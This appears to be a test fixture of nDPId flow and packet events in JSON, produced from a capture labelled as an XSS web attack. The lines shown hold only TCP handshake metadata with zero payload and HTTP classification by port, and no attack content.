+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347207764,"flow_last_seen":1499347213674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347334667,"flow_last_seen":1499347334667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347334667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1499347334667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347334667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ruhAAD4GFuisEAABwKgKMtsaAFCxtOCmAAAAAKACchChtQAAAgQFtAQCCAoBOk5OAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":2,"flow_last_seen":1499347334667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347334667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2xqx52s8sbTgp6AScSBhyAAAAgQFtAQCCAoD5B\/EATpOTgEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3054,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":3,"flow_last_seen":1499347334668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347334668,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rulAAD4GFu+sEAABwKgKMtsaAFCxtOCnsedrPYAQAOUA0AAAAQEICgE6Tk4D5B\/E"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347337226,"flow_last_seen":1499347337226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347337226,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1499347337226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347337226,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TYVAAD4GeEusEAABwKgKMts0AFCRRx1LAAAAAKACchCC5AAAAgQFtAQCCAoBOlDOAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3071,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1499347337226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347337226,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2zQKH2urkUcdTKAScSDn0AAAAgQFtAQCCAoD5CJEATpQzgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3072,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":3,"flow_last_seen":1499347337227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347337227,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TYZAAD4GeFKsEAABwKgKMts0AFCRRx1MCh9rrIAQAOWG2AAAAQEICgE6UM4D5CJE"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3082,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347338485,"flow_last_seen":1499347338485,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347338485,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3082,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1499347338485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347338485,"pkt":"ABm5CmnxAMGxFOsxCABFAAA871JAAD4G1n2sEAABwKgKMttCAFArWL1bAAAAAKACchBHegAAAgQFtAQCCAoBOlIJAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3083,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":2,"flow_last_seen":1499347338485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347338485,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ20LSM68cK1i9XKAScSCfpgAAAgQFtAQCCAoD5CN+ATpSCQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3084,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":3,"flow_last_seen":1499347338486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347338486,"pkt":"ABm5CmnxAMGxFOsxCABFAAA071NAAD4G1oSsEAABwKgKMttCAFArWL1c0jOvHYAQAOU+rgAAAQEICgE6UgkD5CN+"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347339782,"flow_last_seen":1499347339782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347339782,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1499347339782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347339782,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e9RAAD4GSfysEAABwKgKMttQAFCK9SiZAAAAAKACchB7TQAAAgQFtAQCCAoBOlNNAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3098,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1499347339782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347339782,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ21AZ1nzCivUomqAScSC87AAAAgQFtAQCCAoD5CTDATpTTQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1499347339783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347339783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e9VAAD4GSgOsEAABwKgKMttQAFCK9SiaGdZ8w4AQAOVb9AAAAQEICgE6U00D5CTD"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347341106,"flow_last_seen":1499347341106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347341106,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1499347341106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347341106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aWRAAD4GXGysEAABwKgKMtteAFBkzD38AAAAAKACchCKugAAAgQFtAQCCAoBOlSYAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":1499347341106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347341106,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ217gSFdsZMw9\/aAScSAp8gAAAgQFtAQCCAoD5CYOATpUmAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1499347341107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347341107,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aWVAAD4GXHOsEAABwKgKMtteAFBkzD394EhXbYAQAOXI+QAAAQEICgE6VJgD5CYO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347342386,"flow_last_seen":1499347342386,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347342386,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1499347342386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347342386,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DyJAAD4Gtq6sEAABwKgKMttsAFDfC1r6AAAAAKACchDyLgAAAgQFtAQCCAoBOlXYAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":2,"flow_last_seen":1499347342386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347342386,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ22zAs3dz3wta+6AScSCPtAAAAgQFtAQCCAoD5CdOATpV2AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":3,"flow_last_seen":1499347342387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347342387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DyNAAD4GtrWsEAABwKgKMttsAFDfC1r7wLN3dIAQAOUuvAAAAQEICgE6VdgD5CdO"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347343672,"flow_last_seen":1499347343672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343672,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1499347343672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347343672,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83PZAAD4G6NmsEAABwKgKMtt6AFBC4YvvAAAAAKACchBcFQAAAgQFtAQCCAoBOlcZAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":1499347343672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347343672,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ23pctqnYQuGL8KAScSAp8gAAAgQFtAQCCAoD5CiPATpXGQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":1499347343673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347343673,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03PdAAD4G6OCsEAABwKgKMtt6AFBC4YvwXLap2YAQAOXI+AAAAQEICgE6VxoD5CiP"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347210270,"flow_last_seen":1499347215675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347210270,"flow_last_seen":1499347215675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347211522,"flow_last_seen":1499347216676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347211522,"flow_last_seen":1499347216676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347214088,"flow_last_seen":1499347219676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347214088,"flow_last_seen":1499347219676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347215361,"flow_last_seen":1499347220676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347215361,"flow_last_seen":1499347220676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347216659,"flow_last_seen":1499347221677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347216659,"flow_last_seen":1499347221677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347346211,"flow_last_seen":1499347346211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347346211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1499347346211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347346211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZYhAAD4GYEisEAABwKgKMtuUAFCjBDwcAAAAAKACchBJMAAAAgQFtAQCCAoBOlmUAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":1499347346211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347346211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ25SXkk2howQ8HaAScSA17QAAAgQFtAQCCAoD5CsKATpZlAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3151,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":1499347346211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347346211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZYlAAD4GYE+sEAABwKgKMtuUAFCjBDwdl5JNooAQAOXU9AAAAQEICgE6WZQD5CsK"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3160,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347347483,"flow_last_seen":1499347347483,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347347483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3160,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1499347347483,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347347483,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D8lAAD4GtgesEAABwKgKMtuiAFCZ3FUbAAAAAKACchA4DQAAAgQFtAQCCAoBOlrSAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3161,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":1499347347483,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347347483,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ26Ji05dMmdxVHKAScSAOoAAAAgQFtAQCCAoD5CxIATpa0gEDAwc="} 
